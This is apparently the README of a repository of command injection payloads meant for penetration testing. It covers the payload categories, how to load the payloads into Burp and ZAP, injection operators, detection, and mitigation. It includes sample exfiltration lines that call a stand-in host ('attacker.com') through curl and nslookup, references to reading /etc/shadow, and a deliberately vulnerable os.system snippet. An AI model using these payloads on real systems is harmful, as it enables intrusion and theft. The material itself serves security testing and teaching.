A comprehensive collection of command injection payloads for security testing and penetration testing purposes. This repository contains various command injection techniques targeting different operating systems and scenarios.
- Quick Start Guide - Get started in under 5 minutes
- Cheat Sheet - Quick reference for techniques and commands
- Contributing Guidelines - How to contribute to this project
- Project Summary - Complete overview with statistics
- Overview
- Payload Categories
- Installation
- Usage
- Payload Files
- Command Injection Basics
- Detection Techniques
- Prevention and Mitigation
- Contributing
- Disclaimer
- License
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands on the host operating system via a vulnerable application. This repository provides a curated list of payloads organized by technique and platform to assist security professionals in identifying and testing for command injection vulnerabilities.
This repository includes the following payload categories:
- Basic Command Injection: Common command injection patterns using various operators
- Time-Based Command Injection: Payloads for blind command injection detection using time delays
- Encoded Payloads: URL-encoded and obfuscated command injection attempts
- Obfuscated Payloads: Advanced evasion techniques using shell features
- Windows-Specific: Payloads targeting Windows Command Prompt and PowerShell
- Linux/Unix-Specific: Payloads designed for Linux and Unix-based systems
- Data Exfiltration: Commands for extracting sensitive information
- Bypass Techniques: Filter and WAF evasion methods
Clone this repository to your local machine:
git clone https://github.com/payload-box/command-injection-payload-list.git
cd command-injection-payload-list- Open Burp Suite and navigate to the Intruder tab
- Configure your target and injection point
- Click on "Payloads" tab
- Under "Payload Options", click "Load"
- Select the appropriate payload file from the
Intruder/directory - Configure payload processing if needed
- Start the attack
- Open OWASP ZAP and intercept the request
- Right-click on the request and select "Fuzz"
- Highlight the injection point
- Click "Add" under Payloads
- Select "File" as the payload type
- Choose the appropriate payload file from the
Intruder/directory - Start the fuzzer
You can manually test command injection vulnerabilities by copying payloads from the files and injecting them into:
- URL parameters
- POST data fields
- HTTP headers
- File upload functionalities
- Cookie values
- API endpoints
| File Name | Description | Payload Count |
|---|---|---|
command-injection-basic.txt |
Basic command injection using common operators (;, ` |
, |
command-injection-time-based.txt |
Time-based blind injection using sleep, ping, and timeout commands |
130 |
command-injection-encoded.txt |
URL-encoded and special character encoded payloads | 99 |
command-injection-obfuscated.txt |
Obfuscated payloads using shell variables, wildcards, and advanced techniques | 138 |
command-injection-windows.txt |
Windows-specific commands including CMD and PowerShell | 179 |
command-injection-linux.txt |
Linux/Unix-specific commands and utilities | 220 |
command-injection-data-exfiltration.txt |
Payloads for extracting sensitive data | 150 |
command-injection-bypass.txt |
Filter evasion and WAF bypass techniques | 202 |
command-injection-out-of-band.txt |
Out-of-band data exfiltration and reverse shell payloads | 203 |
command-injection-special-chars.txt |
Special characters, edge cases, and delimiter variations | 187 |
command-injection-polyglot.txt |
Polyglot payloads and context-breaking techniques | 223 |
-
Semicolon (
;): Executes commands sequentiallycommand1; command2 -
Pipe (
|): Passes output of one command to anothercommand1 | command2 -
OR (
||): Executes second command if first failscommand1 || command2 -
Ampersand (
&): Runs command in backgroundcommand1 & command2 -
AND (
&&): Executes second command only if first succeedscommand1 && command2 -
Backticks (
`): Command substitution`command` -
Dollar Parentheses (
$()): Command substitution (POSIX)$(command)
Linux/Unix:
- Uses
/bin/sh,/bin/bash, or other shells - Sensitive files:
/etc/passwd,/etc/shadow,/etc/hosts - Common commands:
ls,cat,id,whoami,uname
Windows:
- Uses
cmd.exeor PowerShell - Sensitive files:
C:\Windows\win.ini,C:\Windows\System32\drivers\etc\hosts - Common commands:
dir,type,whoami,systeminfo,net user
Look for command output directly in the response:
; whoami
| id
Measure response time delays:
; sleep 10
| ping -c 10 127.0.0.1
Trigger external connections:
; curl http://attacker.com/?data=$(whoami)
; nslookup $(whoami).attacker.com
Analyze error messages for command execution indicators:
; cat /nonexistent
| invalid-command
- Input Validation: Never trust user input; validate and sanitize all data
- Avoid System Calls: Use built-in language features instead of executing system commands
- Parameterization: Use parameterized APIs that separate commands from data
- Whitelist Approach: Only allow specific, expected values
- Principle of Least Privilege: Run applications with minimal necessary permissions
- Escaping: Properly escape special characters if system calls are unavoidable
- Use Safe APIs: Utilize language-specific safe execution methods
Vulnerable:
import os
filename = request.GET['filename']
os.system('cat ' + filename) # DANGEROUS!Secure:
import subprocess
filename = request.GET['filename']
# Validate filename
if not re.match(r'^[a-zA-Z0-9_.-]+$', filename):
raise ValueError('Invalid filename')
# Use list-based arguments
subprocess.run(['cat', filename], check=True)- Always obtain proper authorization before testing
- Test in isolated environments when possible
- Document all findings thoroughly
- Avoid destructive payloads in production systems
- Follow responsible disclosure practices
Contributions are welcome! If you have additional payloads or improvements:
- Fork the repository
- Create a feature branch (
git checkout -b feature/new-payloads) - Add your payloads to the appropriate file(s)
- Commit your changes (
git commit -am 'Add new obfuscation techniques') - Push to the branch (
git push origin feature/new-payloads) - Create a Pull Request
Please ensure:
- Payloads are tested and functional
- Each payload is on a new line
- Duplicates are avoided
- Documentation is updated accordingly
FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY
This repository is intended for:
- Security researchers
- Penetration testers
- Bug bounty hunters
- Security professionals
- Educational purposes
Important Legal Notice:
- Unauthorized access to computer systems is illegal
- Only test on systems you own or have explicit permission to test
- The contributors and maintainers are not responsible for any misuse
- Users are solely responsible for their actions
- Always comply with local, state, and federal laws
Misuse of this information may result in criminal charges. Use responsibly and ethically.
This project is licensed under the MIT License - see the LICENSE file for details.
- OWASP Testing Guide
- PortSwigger Web Security Academy
- HackTricks
- PayloadsAllTheThings
- Security research community
- QUICK_START.md - Beginner-friendly guide to get started quickly
- CHEAT_SHEET.md - Command injection techniques reference
- CONTRIBUTING.md - Guidelines for contributors
- SUMMARY.md - Project statistics and overview
- GitHub Issues: Report Issues
- Pull Requests: Submit PRs
Stay ethical, stay legal, and happy testing! π